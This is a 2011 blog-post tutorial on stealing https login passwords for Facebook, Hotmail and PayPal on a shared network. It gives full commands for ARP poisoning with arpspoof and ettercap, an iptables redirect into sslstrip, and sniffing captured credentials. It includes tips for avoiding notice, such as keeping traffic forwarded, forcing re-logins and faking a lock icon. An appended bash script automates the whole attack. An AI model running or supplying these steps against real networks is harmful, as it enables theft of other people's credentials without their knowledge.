Tuesday, 15 November 2011

Sniff SSL | https password sniffing 

Tool requirements:
sslstrip, ettercap, arpspoof (all three are already in BackTrack).

OK, I've seen a couple of people complaining that they can't sniff Facebook, Hotmail and PayPal passwords. That's because these sites use an https connection, so before you can sniff those passwords in a MITM attack you need to strip the SSL: sslstrip sits between the victim and the site, talks https to the site and plain http to the victim, so the password crosses the LAN in the clear. Ettercap can MITM SSL itself, but it does that with a forged certificate that makes the browser warn; we're going to use sslstrip because it's better. One caveat: stripping only works when the victim's first request is plain http (typing facebook.com into the address bar, following an http link); a browser that already knows the site is https-only (HSTS) will refuse the downgrade.

First thing you need is BackTrack 4 pre-final. Or you can use another Linux distro and add the tools yourself.
1. First we need to find out what your subnet and default gateway are. Open up a shell and print the routing table:
route

You will get something like this (the addresses have been stripped from the listing; the Gateway column of the "default" route holds the gateway, and the Destination/Genmask pair of the "U" route gives the subnet):
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
* U 0 0 0 wlan0
default UG 0 0 0 wlan0

In my case is the gateway. Therefore is the subnet, and that is what we give nmap.

2. So now we use nmap to find the other machines on the network (-sP is a ping sweep, no port scan; newer nmap versions call it -sn). The subnet from step 1 goes after -sP:
nmap -sP |grep "Host"

3. Now we need to enable the iptables redirect commands in ettercap's config. Since step 4 adds the redirect rule by hand anyway, this only matters if you let ettercap manage the redirect itself, but it costs nothing and avoids surprises later.
nano /etc/etter.conf

Scroll down until you find these lines in the file (they are commented out with a leading #):


# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Change them to this
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Hit Ctrl-X then y then enter

4. Now we create our iptables rule. It takes every forwarded TCP connection to port 80 and hands it to sslstrip on port 10000 (sslstrip's default listening port), so the victim's http traffic goes through sslstrip instead of straight to the gateway:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

5. Now we need to enable IP forwarding. Without it the victim's traffic stops at your machine and they simply lose their connection, which is a giveaway:
echo 1 > /proc/sys/net/ipv4/ip_forward

6. Now we need to find the interface you're using. Run ifconfig and find the interface with your IP address listed underneath it. In my case it's wlan0 (the Iface column of the routing table in step 1 shows the same thing).

7. Now start sslstrip. -a logs all traffic it sees (plain http as well as stripped https), -k kills sessions that are already in progress so the victim has to log in again, and -f swaps in a lock favicon so the page still looks "secure". It listens on port 10000 by default, which matches the iptables rule from step 4, and writes what it captures to sslstrip.log in the current directory.
sslstrip -a -k -f

OPTION A: (better)
1. Open a new shell and start arpspoof. The address after -t is the target (victim) and the last argument is the gateway; arpspoof tells the victim that your MAC is the gateway's.
arpspoof -i wlan0 -t

wlan0 is my interface, the address after -t is my target IP and the last one is my gateway.

2. Finally, open up another shell and start ettercap in sniffer mode (-T is the text interface, -q is quiet, so it only prints what it captures).

ettercap -T -q -i wlan0
wlan0 being your interface
The sniffed passwords will come up in the ettercap window.
Last thing: arpspoof sends the real ARP entries when it gets Ctrl-C, but if it is killed hard or crashes the victims' ARP caches stay poisoned and they lose their connection. To re-ARP them, start ARP spoofing with ettercap and shut it down right away:

ettercap -T -M arp:remote -i wlan0 / /

interface: wlan0 (the two target slots take the victim and the gateway, each written as /address/)

Then just hit "q" and ettercap will re-ARP your victim on the way out. I usually already have this command typed and ready to go in a new shell so I can quickly fix the ARP cache when I'm done.

OPTION B: (easier)
Open up a new shell and start ettercap with ARP poisoning and sniffing in one go:
ettercap -T -i wlan0 -q -M arp:remote // //

interface: wlan0
target: (leave both targets blank, "//", to poison the entire network; be aware that poisoning every host on the subnet is noisy and puts all of their traffic through your machine, so a slow or flaky box can take the whole LAN down)
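The steps above, gathered into one script as an added example (this is not code from the original post): it parses the routing table from step 1, builds the nmap target and the step-4 iptables rule, and runs Option A with a cleanup that undoes the redirect and the ip_forward change when you hit Ctrl-C. Assumptions not in the post: sslstrip is left on its default port 10000, victim and gateway are passed as arguments, the rule is restricted to the attack interface with -i, and the addresses in SAMPLE_ROUTE are constructed test data, not a real network.

```bash
#!/bin/bash
# Added example, not from the original post. The parsing helpers run offline
# against SAMPLE_ROUTE; run_attack needs root and the BackTrack tools.

# Constructed `route -n` output (made-up RFC 1918 addresses) for the helpers.
SAMPLE_ROUTE='Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.1.0     0.0.0.0         255.255.255.0   U     0      0        0 wlan0
0.0.0.0         192.168.1.1     0.0.0.0         UG    0      0        0 wlan0'

# default_gateway ROUTE_TABLE: gateway address of the default (UG) route.
default_gateway() {
  printf '%s\n' "$1" | awk '$1 == "0.0.0.0" && $4 ~ /G/ { print $2; exit }'
}

# default_iface ROUTE_TABLE: interface carrying the default route (step 6).
default_iface() {
  printf '%s\n' "$1" | awk '$1 == "0.0.0.0" && $4 ~ /G/ { print $8; exit }'
}

# mask_to_prefix DOTTED_MASK: 255.255.255.0 -> 24, by counting set bits.
mask_to_prefix() {
  local IFS=. n=0 octet
  for octet in $1; do
    while [ "$octet" -gt 0 ]; do
      n=$(( n + (octet & 1) ))
      octet=$(( octet >> 1 ))
    done
  done
  echo "$n"
}

# local_subnet ROUTE_TABLE: the directly connected network in CIDR form,
# which is what step 2 hands to nmap.
local_subnet() {
  local net mask
  net=$(printf '%s\n' "$1" | awk '$2 == "0.0.0.0" && $4 == "U" { print $1; exit }')
  mask=$(printf '%s\n' "$1" | awk '$2 == "0.0.0.0" && $4 == "U" { print $3; exit }')
  [ -n "$net" ] || return 1
  echo "$net/$(mask_to_prefix "$mask")"
}

# redirect_rule A|D IFACE PORT: the step-4 iptables rule, parameterised so one
# function builds both the rule (-A) and its removal (-D). Adding -i is an
# assumption of this example; the post's rule matches every interface.
redirect_rule() {
  echo "iptables -t nat -$1 PREROUTING -i $2 -p tcp --dport 80 -j REDIRECT --to-ports $3"
}

# run_attack IFACE VICTIM GATEWAY: Option A, with cleanup on Ctrl-C.
run_attack() {
  local iface=$1 victim=$2 gw=$3 port=10000 fwd_before
  fwd_before=$(cat /proc/sys/net/ipv4/ip_forward)

  cleanup() {
    trap - INT TERM EXIT
    # arpspoof's own signal handler re-sends the real ARP entries on TERM/INT;
    # if the victim still can't get out afterwards, use the ettercap re-ARP
    # trick from the post.
    kill "$ARP_PID" "$SSL_PID" 2>/dev/null
    wait "$ARP_PID" "$SSL_PID" 2>/dev/null
    eval "$(redirect_rule D "$iface" "$port")"
    echo "$fwd_before" > /proc/sys/net/ipv4/ip_forward
  }
  trap cleanup INT TERM EXIT

  echo 1 > /proc/sys/net/ipv4/ip_forward             # step 5
  eval "$(redirect_rule A "$iface" "$port")"          # step 4
  sslstrip -a -k -f -l "$port" &                      # step 7
  SSL_PID=$!
  arpspoof -i "$iface" -t "$victim" "$gw" &           # option A, step 1
  ARP_PID=$!
  ettercap -T -q -i "$iface"                          # option A, step 2
}

# Only attack when asked explicitly: ./sslstrip-mitm.sh run wlan0 VICTIM GATEWAY
if [ "${1:-}" = run ]; then
  run_attack "$2" "$3" "$4"
fi
```

On a live box you would feed `route -n` into the helpers instead of SAMPLE_ROUTE (the -n form prints 0.0.0.0 rather than "default" and "*", which is what the awk patterns match), then `nmap -sP "$(local_subnet "$(route -n)")"` gives you the host list from step 2.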
